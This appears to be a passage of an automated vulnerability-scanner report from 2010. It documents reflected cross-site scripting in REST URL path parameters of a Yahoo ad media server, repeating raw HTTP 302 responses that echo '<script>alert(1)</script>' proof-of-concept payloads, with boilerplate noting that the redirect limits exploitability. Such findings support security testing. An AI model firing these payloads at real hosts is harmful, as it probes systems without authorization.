HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore74a41<script>alert(1)</script>8dd34fb94e2/062730bb-1899-481b-a0a5-5d453b885c3c?noredirect=1 x-ysws-request-id: 92f49b23-3401-4bc4-bf75-1a39642a86e1 Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore74a41<script>alert(1)</script>8dd34fb94e2/062730bb-1899-481b-a0a5-5d453b885c3c</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1ea2<script>alert(1)</script>00aa69cda0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/062730bb-1899-481b-a0a5-5d453b885c3ce1ea2<script>alert(1)</script>00aa69cda0?noredirect=1 x-ysws-request-id: e8aadf1c-9db3-4851-8fa6-14e240edeea1 Date: Mon, 15 Nov 2010 02:47:09 GMT Connection: close Content-Length: 169
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/062730bb-1899-481b-a0a5-5d453b885c3ce1ea2<script>alert(1)</script>00aa69cda0</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 80bfa<script>alert(1)</script>f2ae7e14495 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex80bfa<script>alert(1)</script>f2ae7e14495/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b070?noredirect=1 x-ysws-request-id: 1a96c02e-3522-4806-bea5-7964f61b6115 Date: Mon, 15 Nov 2010 02:47:09 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex80bfa<script>alert(1)</script>f2ae7e14495/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b070</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a23eb<script>alert(1)</script>c1996285358 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastorea23eb<script>alert(1)</script>c1996285358/383c4ed9-f242-4f61-b9cc-f1091f29b070?noredirect=1 x-ysws-request-id: 8dfd597d-a41a-4484-b3a1-9f2925825065 Date: Mon, 15 Nov 2010 02:47:11 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastorea23eb<script>alert(1)</script>c1996285358/383c4ed9-f242-4f61-b9cc-f1091f29b070</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 86c2d<script>alert(1)</script>d69f280c0fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b07086c2d<script>alert(1)</script>d69f280c0fd?noredirect=1 x-ysws-request-id: e9fd8904-6866-4f78-8bdc-944409305cf1 Date: Mon, 15 Nov 2010 02:47:11 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b07086c2d<script>alert(1)</script>d69f280c0fd</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2683f<script>alert(1)</script>e6012a37d97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex2683f<script>alert(1)</script>e6012a37d97/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6?noredirect=1 x-ysws-request-id: 6faaadb3-7f6c-4187-afcc-7cb0b881060e Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex2683f<script>alert(1)</script>e6012a37d97/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dc93d<script>alert(1)</script>0f584ef95a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastoredc93d<script>alert(1)</script>0f584ef95a0/52b2888f-eb6d-4556-a1ff-b178fce39ee6?noredirect=1 x-ysws-request-id: f88fae0a-f89f-46b3-ad9d-e05ac105e397 Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastoredc93d<script>alert(1)</script>0f584ef95a0/52b2888f-eb6d-4556-a1ff-b178fce39ee6</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 887a0<script>alert(1)</script>0e955ccd05b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6887a0<script>alert(1)</script>0e955ccd05b?noredirect=1 x-ysws-request-id: 983cc645-db79-442d-9295-0a9b3986b273 Date: Mon, 15 Nov 2010 02:47:09 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6887a0<script>alert(1)</script>0e955ccd05b</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a4c02<script>alert(1)</script>e9432b0d3af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apexa4c02<script>alert(1)</script>e9432b0d3af/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a?noredirect=1 x-ysws-request-id: a4322685-d549-4c9e-ad95-8253227cff39 Date: Mon, 15 Nov 2010 02:47:10 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apexa4c02<script>alert(1)</script>e9432b0d3af/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1ae28<script>alert(1)</script>fe445d331e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore1ae28<script>alert(1)</script>fe445d331e9/5e6edab9-925f-4cc4-ae36-5a558abc5d6a?noredirect=1 x-ysws-request-id: db699bc5-50a5-44a4-b9f9-195ab3c2011f Date: Mon, 15 Nov 2010 02:47:13 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore1ae28<script>alert(1)</script>fe445d331e9/5e6edab9-925f-4cc4-ae36-5a558abc5d6a</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3158b<script>alert(1)</script>83c13893aeb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a3158b<script>alert(1)</script>83c13893aeb?noredirect=1 x-ysws-request-id: 30d0f159-8a2b-4d5f-984d-d3f0e9b84b39 Date: Mon, 15 Nov 2010 02:47:14 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a3158b<script>alert(1)</script>83c13893aeb</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload daae7<script>alert(1)</script>ddb88bc0fd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apexdaae7<script>alert(1)</script>ddb88bc0fd6/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d7?noredirect=1 x-ysws-request-id: fda1710b-d12a-4b6e-af08-ff6ea2f3adfe Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apexdaae7<script>alert(1)</script>ddb88bc0fd6/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d7</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d78c6<script>alert(1)</script>1c1bed06d69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastored78c6<script>alert(1)</script>1c1bed06d69/8ba866c3-ac17-4b3d-baf7-9a95af0665d7?noredirect=1 x-ysws-request-id: 6bd8ebdf-38eb-4e71-a7d5-4f806485fb94 Date: Mon, 15 Nov 2010 02:47:09 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastored78c6<script>alert(1)</script>1c1bed06d69/8ba866c3-ac17-4b3d-baf7-9a95af0665d7</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 26529<script>alert(1)</script>d4f8b951927 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d726529<script>alert(1)</script>d4f8b951927?noredirect=1 x-ysws-request-id: 565b6772-c93e-4ddf-a914-da0f564b8581 Date: Mon, 15 Nov 2010 02:47:11 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d726529<script>alert(1)</script>d4f8b951927</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 49b0b<script>alert(1)</script>a73dfe813ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex49b0b<script>alert(1)</script>a73dfe813ad/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf879?noredirect=1 x-ysws-request-id: 0af2e37f-0848-41c2-af41-97fb4cf573c3 Date: Mon, 15 Nov 2010 02:47:10 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex49b0b<script>alert(1)</script>a73dfe813ad/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf879</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee668<script>alert(1)</script>3f8c94910d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastoreee668<script>alert(1)</script>3f8c94910d9/8d3d0f79-5b47-4138-9678-2297d2caf879?noredirect=1 x-ysws-request-id: ec9c89b3-ff65-465b-9444-8422a987b98f Date: Mon, 15 Nov 2010 02:47:11 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastoreee668<script>alert(1)</script>3f8c94910d9/8d3d0f79-5b47-4138-9678-2297d2caf879</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 64b01<script>alert(1)</script>272af64e524 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf87964b01<script>alert(1)</script>272af64e524?noredirect=1 x-ysws-request-id: 5a119b6f-a94a-46c6-a2cf-eb8820233db4 Date: Mon, 15 Nov 2010 02:47:12 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf87964b01<script>alert(1)</script>272af64e524</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b93b8<script>alert(1)</script>b7424893522 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apexb93b8<script>alert(1)</script>b7424893522/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a?noredirect=1 x-ysws-request-id: abd31413-6f5d-4b70-8ac0-4f36b15a6aeb Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apexb93b8<script>alert(1)</script>b7424893522/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4be3d<script>alert(1)</script>dc49770a472 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore4be3d<script>alert(1)</script>dc49770a472/93e8d828-2c6f-42fb-b852-7b8b0226097a?noredirect=1 x-ysws-request-id: 0b00d342-ddbd-42a1-8d04-326f694bba78 Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore4be3d<script>alert(1)</script>dc49770a472/93e8d828-2c6f-42fb-b852-7b8b0226097a</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52adb<script>alert(1)</script>cb503ec4565 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a52adb<script>alert(1)</script>cb503ec4565?noredirect=1 x-ysws-request-id: 4d9bbe28-565d-496e-9fcd-733f2e00ac0e Date: Mon, 15 Nov 2010 02:47:09 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a52adb<script>alert(1)</script>cb503ec4565</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73cb2<script>alert(1)</script>b637cd0aa47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
